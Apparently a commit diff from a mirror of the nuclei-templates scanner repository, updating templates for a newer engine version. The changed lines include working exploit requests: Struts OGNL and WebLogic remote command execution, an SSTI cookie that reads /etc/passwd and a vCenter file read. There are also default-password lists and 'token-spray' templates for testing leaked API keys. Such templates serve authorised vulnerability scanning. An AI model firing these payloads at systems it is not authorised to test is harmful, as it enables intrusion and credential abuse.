daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #2844 from projectdiscovery/more-fixes 

Changes to adopt v2.5.3 engine
patch-1
Sandeep Singh 2021-10-21 07:21:20 +05:30 committed by GitHub
parent df54ed28f7 1eaff3bfff
commit a21cec6362
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
85 changed files with 129 additions and 79 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
.nuclei-ignore
View File

@ -14,8 +14,3 @@ tags:
# files is a list of files to ignore template execution
# unless asked for by the user.
files:
- "token-spray/"

17
cves/2013/CVE-2013-2251.yaml
View File

@ -11,25 +11,19 @@ info:
requests:
- raw:
- |
GET /index.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
GET /index.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept: */*
Accept-Language: en
- |
GET /login.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
GET /login.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept: */*
Accept-Language: en
- |
GET /index.action?§params§%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1
GET /index.action?{{params}}%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept: */*
Accept-Language: en
payloads:
params:
@ -40,11 +34,12 @@ requests:
matchers-condition: and
matchers:
- type: status
condition: or
status:
- 200
- 400
condition: or
- type: regex
part: body
regex:
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
part: body

7
cves/2017/CVE-2017-17562.yaml
View File

@ -91,15 +91,16 @@ requests:
- webviewer
- welcome
attack: sniper
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
condition: and
words:
- "environment variable"
- "display library search paths"
condition: and
- "display library search paths"

4
cves/2019/CVE-2019-17382.yaml
View File

@ -22,14 +22,16 @@ requests:
payloads:
ids: helpers/wordlists/numbers.txt
attack: sniper
threads: 50
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<title>Dashboard</title>"

7
cves/2020/CVE-2020-14882.yaml
View File

@ -28,8 +28,7 @@ requests:
- |
POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1
Host: {{Hostname}}
cmd: §exec§
Connection: close
cmd: {{exec}}
Content-Type: application/x-www-form-urlencoded; charset=utf-8
_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession%28%22var%20m%20%3D%20java.lang.Class.forName%28%22weblogic.work.ExecuteThread%22%29.getDeclaredMethod%28%22getCurrentWork%22%29%3B%20var%20currThread%20%3D%20java.lang.Thread.currentThread%28%29%3B%20var%20currWork%20%3D%20m.invoke%28currThread%29%3B%20var%20f2%20%3D%20currWork.getClass%28%29.getDeclaredField%28%22connectionHandler%22%29%3B%20f2.setAccessible%28true%29%3B%20var%20connectionHandler%20%3D%20f2.get%28currWork%29%3B%20var%20f3%20%3D%20connectionHandler.getClass%28%29.getDeclaredField%28%22request%22%29%3B%20f3.setAccessible%28true%29%3B%20var%20request%20%3D%20f3.get%28connectionHandler%29%3B%20var%20command%20%3D%20request.getHeader%28%22cmd%22%29%3B%20var%20response%20%3D%20request.getResponse%28%29%3B%20var%20isWin%20%3D%20java.lang.System.getProperty%28%22os.name%22%29.toLowerCase%28%29.contains%28%22win%22%29%3B%20var%20listCmd%20%3D%20new%20java.util.ArrayList%28%29%3B%20var%20p%20%3D%20new%20java.lang.ProcessBuilder%28%22%22%29%3B%20if%28isWin%29%7Bp.command%28%22cmd.exe%22%2C%20%22%2Fc%22%2C%20command%29%3B%20%7Delse%7Bp.command%28%22%2Fbin%2Fbash%22%2C%20%22-c%22%2C%20command%29%3B%20%7D%20p.redirectErrorStream%28true%29%3B%20var%20process%20%3D%20p.start%28%29%3B%20var%20output%20%3D%20process.getInputStream%28%29%3B%20var%20scanner%20%3D%20new%20java.util.Scanner%28output%29.useDelimiter%28%22%5C%5C%5C%5CA%22%29%3B%20var%20out%20%3D%20scanner.next%28%29%3B%20var%20outputStream%20%3D%20response.getServletOutputStream%28%29%3B%20outputStream.write%28out.getBytes%28%29%29%3B%20outputStream.flush%28%29%3B%20response.getWriter%28%29.write%28%22%22%29%3B%20currThread.interrupt%28%29%3B%22%29
@ -41,12 +40,12 @@ requests:
matchers-condition: and
matchers:
- type: regex
condition: or
regex:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
condition: or
part: body
- type: status
status:

3
cves/2020/CVE-2020-7961.yaml
View File

@ -31,11 +31,12 @@ requests:
command:
- "systeminfo" # Windows
- "lsb_release -a" # Linux
attack: sniper
matchers-condition: and
matchers:
- type: regex
condition: or
regex:
- "OS Name:.*Microsoft Windows"
- "Distributor ID:"

2
cves/2020/CVE-2020-9757.yaml
View File

@ -22,6 +22,8 @@ requests:
path:
- "{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}"
- "{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}"
skip-variables-check: true
matchers-condition: and
matchers:
- type: status

12
default-logins/grafana/grafana-default-login.yaml
View File

@ -1,4 +1,5 @@
id: grafana-default-login
info:
name: Grafana Default Login
author: pdteam
@ -26,7 +27,6 @@ requests:
username:
- admin
- admin
password:
- prom-operator
- admin
@ -35,16 +35,14 @@ requests:
matchers:
- type: word
words:
- grafana_session
- "grafana_session" # Login cookie
part: header
# Check for 'grafana_session' cookie on valid login in the response header.
- type: word
words:
- Logged in
part: body
# Check for valid string on valid login.
words:
- "Logged in" # Logged in keyword
- type: status
status:
- 200
- 200

4
default-logins/hp/hp-switch-default-login.yaml
View File

@ -20,15 +20,13 @@ requests:
username:
- admin
attack: sniper
matchers-condition: and
matchers:
- type: word
condition: and
words:
- '"redirect": "/htdocs/pages/main/main.lsp"'
- '"error": ""'
condition: and
- type: status
status:

9
default-logins/idemia/idemia-biometrics-default-login.yaml
View File

@ -18,22 +18,21 @@ requests:
payloads:
password:
- 12345
attack: sniper
- "12345"
matchers-condition: and
matchers:
- type: word
condition: and
words:
- "session_id="
- "resource"
condition: and
- type: word
words:
- "Invalid Password"
part: body
negative: true
words:
- "Invalid Password"
- type: status
status:

6
fuzzing/adminer-panel-fuzz.yaml
View File

@ -23,17 +23,17 @@ requests:
payloads:
path: helpers/wordlists/adminer-paths.txt
attack: sniper
threads: 50
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
condition: and
words:
- "- Adminer</title>"
- "partial(verifyVersion, "
condition: and
- "partial(verifyVersion"
- type: status
status:
- 200

2
fuzzing/mdb-database-file.yaml
View File

@ -14,12 +14,10 @@ requests:
Host: {{Hostname}}
Origin: {{BaseURL}}
Accept-Language: en-US,en;q=0.9
Connection: close
payloads:
mdbPaths: helpers/wordlists/mdb-paths.txt
attack: sniper
threads: 50
max-size: 500 # Size in bytes - Max Size to read from server response
stop-at-first-match: true

6
fuzzing/prestashop-module-fuzz.yaml
View File

@ -1,4 +1,5 @@
id: prestashop-module-fuzz
info:
name: Prestashop Modules Enumeration
author: meme-lord
@ -16,19 +17,18 @@ requests:
payloads:
path: helpers/wordlists/prestashop-modules.txt
attack: sniper
threads: 50
threads: 50
matchers-condition: and
matchers:
- type: word
condition: and
words:
- "<module>"
- "<name>"
- "<displayName>"
- "<is_configurable>"
- "</module>"
condition: and
- type: status
status:

6
fuzzing/wordpress-plugins-detect.yaml
View File

@ -1,4 +1,5 @@
id: wordpress-plugins-detect
info:
name: WordPress Plugins Detection
author: 0xcrypto
@ -13,11 +14,8 @@ requests:
payloads:
pluginSlug: helpers/wordlists/wordpress-plugins.txt
attack: sniper
threads: 50
redirects: true
max-redirects: 1
threads: 50
matchers-condition: and
matchers:
- type: status

6
fuzzing/wordpress-themes-detect.yaml
View File

@ -1,4 +1,5 @@
id: wordpress-themes-detect
info:
name: WordPress Theme Detection
author: 0xcrypto
@ -13,11 +14,8 @@ requests:
payloads:
themeSlug: helpers/wordlists/wordpress-themes.txt
attack: sniper
threads: 50
redirects: true
max-redirects: 1
threads: 50
matchers-condition: and
matchers:
- type: status

4
miscellaneous/ntlm-directories.yaml
View File

@ -14,6 +14,7 @@ requests:
Host: {{Hostname}}
Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
threads: 50
payloads:
path:
- /
@ -63,9 +64,6 @@ requests:
- /webticket/webticketservice.svcabs/
- /adfs/services/trust/2005/windowstransport
attack: sniper
threads: 50
matchers-condition: and
matchers:
- type: dsl

14
token-spray/README.md
View File

@ -1,15 +1,19 @@
## About
This directory holds templates that have static API URL endpoints. Use these to test an API token against many API service endpoints. By providing token input using flag, Nuclei will test the token against all known API endpoints within the API templates, and return any successful results. By incorporating API checks as Nuclei Templates, users can test API keys that have no context (i.e., API keys that do not indicate for which API endpoint they are meant).
## Usage
You do not need to specify an input URL to test a token against these API endpoints, as the API endpoints have static URLs. However, Nuclei requires an input (specified via `-u` for individual URLs or `-l` for a file containing URLs). Because of this requirement, we simply pass in `-u "null"`. Each template in the `token-spray` directory assumes the input API token will be provided using CLI `var` flag.
```bash
# Run Nuclei specifying all the api templates:
token-spray are **self-contained** template and does not requires URLs as input as the API endpoints have static URLs predefined in the template. Each template in the `token-spray` directory assumes the input API token/s will be provided using CLI `var` flag.
nuclei -u null -t token-spray/ -var token=thisIsMySecretTokenThatIWantToTest
```console
# Running token-spray templates against a single token to test
nuclei -t token-spray/ -var token=random-token-to-test
# Running token-spray templates against a file containing multiple new line delimited tokens
nuclei -t token-spray/ -var token=file_with_tokens.txt
```
## Credits
These API testing templates were inspired by the [streaak/keyhacks](https://github.com/streaak/keyhacks) repository. The Bishop Fox [Continuous Attack Surface Testing (CAST)](https://www.bishopfox.com/continuous-attack-surface-testing/how-cast-works/) team created additional API templates for testing API keys uncovered during investigations. You are welcome to add new templates based on the existing format to cover more APIs.
These API testing templates were inspired by the [streaak/keyhacks](https://github.com/streaak/keyhacks) repository. The Bishop Fox [Continuous Attack Surface Testing (CAST)](https://www.bishopfox.com/continuous-attack-surface-testing/how-cast-works/) team created additional API templates for testing API keys uncovered during investigations. You are welcome to add new templates based on the existing format to cover more APIs.

3
token-spray/asana.yaml
View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,asana
self-contained: true
requests:
- method: GET
path:
@ -16,6 +17,6 @@ requests:
matchers:
- type: status
negative: true
status:
- 401
negative: true

1
token-spray/bingmaps.yaml
View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,bing,maps,bingmaps
self-contained: true
requests:
- method: GET
path:

1
token-spray/bitly.yaml
View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,bitly
self-contained: true
requests:
- method: GET
path:

1
token-spray/buildkite.yaml
View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,buildkite
self-contained: true
requests:
- method: GET
path:

1
token-spray/buttercms.yaml
View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,buttercms
self-contained: true
requests:
- method: GET
path:

1
token-spray/calendly.yaml
View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,calendly
self-contained: true
requests:
- method: GET
path:

1
token-spray/circleci.yaml
View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,circle,circleci
self-contained: true
requests:
- method: GET
path:

1
token-spray/deviantart.yaml
View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,deviantart
self-contained: true
requests:
- method: POST
path:

1
token-spray/dropbox.yaml
View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,dropbox
self-contained: true
requests:
- method: POST
path:

1
token-spray/github.yaml
View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,github
self-contained: true
requests:
- method: GET
path:

1
token-spray/google-autocomplete.yaml
View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,autocomplete
self-contained: true
requests:
- method: GET
path:

1
token-spray/google-customsearch.yaml
View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,search
self-contained: true
requests:
- method: GET
path:

1
token-spray/google-directions.yaml
View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,directions
self-contained: true
requests:
- method: GET
path:

1
token-spray/google-elevation.yaml
View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,elevation
self-contained: true
requests:
- method: GET
path:

1
token-spray/google-fcm.yaml
View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,fcm,firebase,cloud,messaging
self-contained: true
requests:
- method: POST
path:

1
token-spray/google-findplacefromtext.yaml
View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,find,text
self-contained: true
requests:
- method: GET
path:

1
token-spray/google-gedistancematrix.yaml
View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,distance,matrix
self-contained: true
requests:
- method: GET
path:

1
token-spray/google-geocode.yaml
View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,geocode
self-contained: true
requests:
- method: GET
path:

8
token-spray/google-geolocation.yaml
View File

@ -6,19 +6,21 @@ info:
severity: info
tags: token-spray,google,geolocation
self-contained: true
requests:
- method: GET
path:
- "https://www.googleapis.com/geolocation/v1/geolocate?key={{token}}"
matchers-condition: and
matchers-condition: and
matchers:
- type: word
part: body
negative: true
words:
- 'error'
negative: true
- type: status
negative: true
status:
- 404
negative: true

1
token-spray/google-mapsembed.yaml
View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,maps,embed
self-contained: true
requests:
- method: GET
path:

1
token-spray/google-mapsembedadvanced.yaml
View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,maps,embed
self-contained: true
requests:
- method: GET
path:

1
token-spray/google-nearbysearch.yaml
View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,search,nearby
self-contained: true
requests:
- method: GET
path:

1
token-spray/google-nearestroads.yaml
View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,roads
self-contained: true
requests:
- method: GET
path:

1
token-spray/google-placedetails.yaml
View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,place,details
self-contained: true
requests:
- method: GET
path:

1
token-spray/google-placesphoto.yaml
View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,places,photo
self-contained: true
requests:
- method: GET
path:

1
token-spray/google-playablelocations.yaml
View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,playable,locations
self-contained: true
requests:
- method: GET
path:

1
token-spray/google-routetotraveled.yaml
View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,route
self-contained: true
requests:
- method: GET
path:

1
token-spray/google-speedlimit.yaml
View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,speed,limit
self-contained: true
requests:
- method: GET
path:

1
token-spray/google-staticmaps.yaml
View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,maps
self-contained: true
requests:
- method: GET
path:

1
token-spray/google-streetview.yaml
View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,streetview
self-contained: true
requests:
- method: GET
path:

1
token-spray/google-timezone.yaml
View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,timezone
self-contained: true
requests:
- method: GET
path:

3
token-spray/googlet-extsearchplaces.yaml
View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,search,places,text
self-contained: true
requests:
- method: GET
path:
@ -14,6 +15,6 @@ requests:
matchers:
- type: word
part: body
negative: true
words:
- 'error_message'
negative: true

3
token-spray/heroku.yaml
View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,heroku
self-contained: true
requests:
- method: POST
path:
@ -17,9 +18,9 @@ requests:
matchers:
- type: status
condition: or
status:
- 200
- 201
- 202
- 206
condition: or

1
token-spray/hubspot.yaml
View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,hubspot
self-contained: true
requests:
- method: GET
path:

1
token-spray/instagram.yaml
View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,instagram,graph
self-contained: true
requests:
- method: GET
path:

1
token-spray/ipstack.yaml
View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,ipstack
self-contained: true
requests:
- method: GET
path:

1
token-spray/iterable.yaml
View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,iterable
self-contained: true
requests:
- method: GET
path:

1
token-spray/jumpcloud.yaml
View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,jumpcloud
self-contained: true
requests:
- method: GET
path:

1
token-spray/lokalise.yaml
View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,lokalise
self-contained: true
requests:
- method: GET
path:

1
token-spray/loqate.yaml
View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,loqate
self-contained: true
requests:
- method: GET
path:

1
token-spray/mailchimp.yaml
View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,mailchimp
self-contained: true
network:
- inputs:
- data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n"

1
token-spray/mailgun.yaml
View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,mailgun
self-contained: true
requests:
- method: GET
path:

1
token-spray/mapbox.yaml
View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,mapbox
self-contained: true
requests:
- method: GET
path:

1
token-spray/nerdgraph.yaml
View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,newrelic,nerdgraph
self-contained: true
requests:
- method: POST
path:

1
token-spray/npm.yaml
View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,node,npm,package,manager
self-contained: true
requests:
- method: GET
path:

1
token-spray/openweather.yaml
View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,weather,openweather
self-contained: true
requests:
- method: GET
path:

1
token-spray/pagerduty.yaml
View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,pagerduty
self-contained: true
requests:
- method: GET
path:

1
token-spray/pendo.yaml
View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,pendo
self-contained: true
requests:
- method: GET
path:

1
token-spray/pivotaltracker.yaml
View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,pivotaltracker
self-contained: true
requests:
- method: GET
path:

1
token-spray/postmark.yaml
View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,postmark
self-contained: true
requests:
- method: GET
path:

1
token-spray/sendgrid.yaml
View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,sendgrid
self-contained: true
network:
- inputs:
- data: "ehlo\r\n"

1
token-spray/slack.yaml
View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,slack
self-contained: true
requests:
- method: POST
path:

1
token-spray/sonarcloud.yaml
View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,sonarcloud
self-contained: true
requests:
- method: GET
path:

1
token-spray/spotify.yaml
View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,spotify
self-contained: true
requests:
- method: GET
path:

1
token-spray/square.yaml
View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,square
self-contained: true
requests:
- method: GET
path:

1
token-spray/stripe.yaml
View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,stripe
self-contained: true
requests:
- method: GET
path:

1
token-spray/tinypng.yaml
View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,tinypng
self-contained: true
requests:
- method: POST
path:

1
token-spray/travisci.yaml
View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,travis
self-contained: true
requests:
- method: GET
path:

1
token-spray/twitter.yaml
View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,twitter
self-contained: true
requests:
- method: GET
path:

1
token-spray/visualstudio.yaml
View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,visualstudio,microsoft
self-contained: true
requests:
- method: GET
path:

1
token-spray/wakatime.yaml
View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,wakatime
self-contained: true
requests:
- method: GET
path:

1
token-spray/weglot.yaml
View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,weglot
self-contained: true
requests:
- method: POST
path:

4
token-spray/youtube.yaml
View File

@ -7,17 +7,19 @@ info:
severity: info
tags: token-spray,youtube
self-contained: true
requests:
- method: GET
path:
- "https://www.googleapis.com/youtube/v3/activities?part=contentDetails&maxResults=25&channelId=UC-lHJZR3Gqxm24_Vd_AJ5Yw&key={{token}}"
matchers-condition: or
matchers-condition: or
matchers:
- type: word
part: body
words:
- 'quotaExceeded'
- type: status
status:
- 200

3
vulnerabilities/gitlab/gitlab-user-enumeration.yaml
View File

@ -16,10 +16,9 @@ requests:
Accept: application/json, text/plain, */*
Referer: {{BaseURL}}
threads: 50
payloads:
user: helpers/wordlists/user-list.txt
attack: sniper
threads: 50
matchers-condition: and
matchers:

3
vulnerabilities/gitlab/gitlab-user-open-api.yaml
View File

@ -15,10 +15,9 @@ requests:
Accept: application/json, text/plain, */*
Referer: {{BaseURL}}
threads: 50
payloads:
uid: helpers/wordlists/numbers.txt
attack: sniper
threads: 50
matchers-condition: and
matchers:

2
vulnerabilities/other/pdf-signer-ssti-to-rce.yaml
View File

@ -12,6 +12,8 @@ requests:
- "{{BaseURL}}"
headers:
Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl"
skip-variables-check: true
matchers-condition: and
matchers:
- type: status

2
vulnerabilities/other/rconfig-rce.yaml
View File

@ -33,7 +33,7 @@ requests:
--01b28e152ee044338224bf647275f8eb
Content-Disposition: form-data; name="email"
test@{{randstr.tld}}
test@{{randstr}}.tld
--01b28e152ee044338224bf647275f8eb
Content-Disposition: form-data; name="editid"

5
vulnerabilities/vmware/vmware-vcenter-lfi.yaml
View File

@ -12,7 +12,7 @@ info:
requests:
- raw:
- |
GET /eam/vib?id=§path§\vcdb.properties HTTP/1.1
GET /eam/vib?id={{path}}\vcdb.properties HTTP/1.1
Host: {{Hostname}}
payloads:
@ -20,14 +20,13 @@ requests:
- "C:\\ProgramData\\VMware\\VMware+VirtualCenter" # vCenter Server 5.5 and earlier (Windows 2008)
- "C:\\Documents+and+Settings\\All+Users\\Application+Data\\VMware\\VMware+VirtualCenter" # Other Windows versions
- "C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx" # vCenter Server => 6.0
attack: sniper
matchers-condition: and
matchers:
- type: regex
regex:
- "(?m)^(driver|dbtype|password(\\.encrypted)?)\\s="
part: body
- type: status
status:
- 200